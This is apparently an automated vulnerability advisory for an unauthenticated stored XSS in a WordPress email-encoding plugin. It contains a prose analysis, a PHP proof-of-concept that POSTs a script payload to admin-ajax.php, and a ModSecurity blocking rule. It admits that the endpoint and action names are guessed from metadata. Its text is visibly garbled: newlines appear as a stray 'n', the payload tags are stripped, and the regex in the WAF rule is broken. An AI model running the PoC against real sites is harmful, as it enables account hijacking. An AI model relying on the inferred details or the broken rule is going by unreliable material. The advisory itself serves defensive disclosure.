CVE-2026-5305: Email Encoder < 0.3.12 (premium) < 1.0.25 (free) Unauthenticated Stored Cross-Site Scripting PoC, Patch Analysis & Rule

{
“analysis”: “Atomic Edge analysis of CVE-2026-5305 (metadata-based): This vulnerability affects the Email Encoder plugin for WordPress, specifically the premium version below 0.3.12 and the free version below 1.0.25. It allows unauthenticated stored cross-site scripting (XSS) with a CVSS score of 7.2, indicating high severity. The CVSS vector (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) confirms no authentication or user interaction is required, and the scope change means the attack impacts resources beyond the vulnerable component. The vulnerability resides in insufficient input sanitization and output escaping, leading to arbitrary script injection.nnRoot Cause: The CWE-79 classification points to improper neutralization of user-supplied input during web page generation. Atomic Edge research infers that the plugin likely processes email addresses or shortcodes via AJAX handlers, REST API endpoints, or template shortcodes without adequate sanitization. The premium version (below 0.3.12) probably introduces additional features such as email obfuscation or click-to-copy functionality that accept unsanitized parameters. Since no code diff is available, we cannot confirm the exact hook, but the description states multiple themes and plugins are affected, suggesting a shared library or common function lacks proper escaping. The missing nonce verification or capability checks correlate with the unauthenticated nature of the attack.nnExploitation: An attacker sends a crafted HTTP POST request to the WordPress AJAX endpoint at /wp-admin/admin-ajax.php with the action parameter set to a plugin-specific hook like email_encoder_premium_save_email or a REST API route such as /wp-json/email-encoder/v1/encode. The request includes a payload parameter containing malicious JavaScript, for example “alert(document.cookie)”. The plugin stores this input into the WordPress database via the $wpdb->insert method without sanitization or escaping. When a user visits a page that renders this stored data (e.g., a post or widget), the script executes in the user’s browser. Atomic Edge analysis reconstructs this attack path based on the CWE and typical WordPress plugin patterns.nnRemediation: The fix requires implementing proper input validation and output escaping in all plugin code paths that handle user data. Atomic Edge research recommends using functions such as wp_kses() for allowed HTML filtering, sanitize_text_field() for plain text, and esc_html(), esc_url(), or esc_js() when outputting data to the browser. For AJAX handlers, the plugin should verify nonces with check_ajax_referer() and enforce capability checks via current_user_cans() for authenticated actions. Database values should be escaped with esc_sql() or use prepared statements to prevent broader injection attacks. The vendor patched this in version 0.3.12 (premium) and 1.0.25 (free).nnImpact: Successful exploitation enables an unauthenticated attacker to inject arbitrary JavaScript into WordPress pages. This can lead to session hijacking, cookie theft, redirection to malicious sites, defacement, or phishing attacks. Since the CVSS scope is changed (S:C), the attacker can affect resources outside the plugin’s intended boundary, such as the WordPress admin interface or other plugin data. The confidentiality and integrity impacts are low (C:L/I:L), meaning limited data exposure and modification, but combined with the lack of authentication and user interaction, the practical risk is significant for sites using the vulnerable plugin.”,
poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-5305 – Email Encoder < 0.3.12 (premium) < 1.0.25 (free) – Unauthenticated Stored Cross-Site Scriptingnn// Configurationn$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress sitenn// Step 1: Determine the vulnerable endpoint (inferred from plugin slug and CWE)n// The premium version likely exposes an AJAX action for saving email encoding/settingsn$ajax_url = $target_url . '/wp-admin/admin-ajax.php';nn// Step 2: Craft payload (stored XSS via unsanitized parameter)n$payload = 'alert(“XSS_Atomic_Edge”);’;nn// Step 3: Build POST data with guessed action namen// Typical actions for Email Encoder premium: email_encoder_save, email_encoder_save_email, etc.n$post_data = array(n ‘action’ => ’email_encoder_premium_save_email’, // Inferred from plugin slug and versionn ’email’ => $payloadn);nnecho “[+] Targeting $ajax_url\n”;necho “[+] Sending payload: $payload\n”;nn// Step 4: Send request (no authentication, no nonce)n$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $ajax_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);n$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nn// Step 5: Verify response (expect 200 with success message or stored data echo back)nif ($http_code == 200) {n echo “[+] Request succeeded (HTTP 200)\n”;n if (strpos($response, ‘script’) !== false) {n echo “[!] Payload reflected in response – stored XSS likely successful\n”;n } else {n echo “[*] Response does not reflect payload (may still be stored)\n”;n }n echo “[+] Response:\n$response\n”;n} else {n echo “[-] Request failed with HTTP $http_code\n”;n echo “[*] Response: $response\n”;n}n”,
modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-5305 (metadata-based)n# Block unauthenticated stored XSS via Email Encoder premium AJAX handlern# Matches POST to admin-ajax.php with action likely used by the pluginn# Requires suspicious script content in the email parameternSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20265305,phase:2,deny,status:403,chain,msg:’CVE-2026-5305 – Email Encoder XSS via AJAX’,severity:’CRITICAL’,tag:’CVE-2026-5305′”n SecRule ARGS_POST:action “@streq email_encoder_premium_save_email” \n “chain”n SecRule ARGS_POST:email “@rx ]*>” \n “t:none”nn# Alternate rule for REST API endpoint (inferred route)n# Note: If the plugin uses a REST API instead of AJAX, uncomment and adjustn# SecRule REQUEST_URI “@beginsWith /wp-json/email-encoder/v1/” \n# “id:20265306,phase:2,deny,status:403,chain,msg:’CVE-2026-5305 – Email Encoder XSS via REST’,severity:’CRITICAL’,tag:’CVE-2026-5305′”n# SecRule ARGS_POST:email “@rx ]*>”n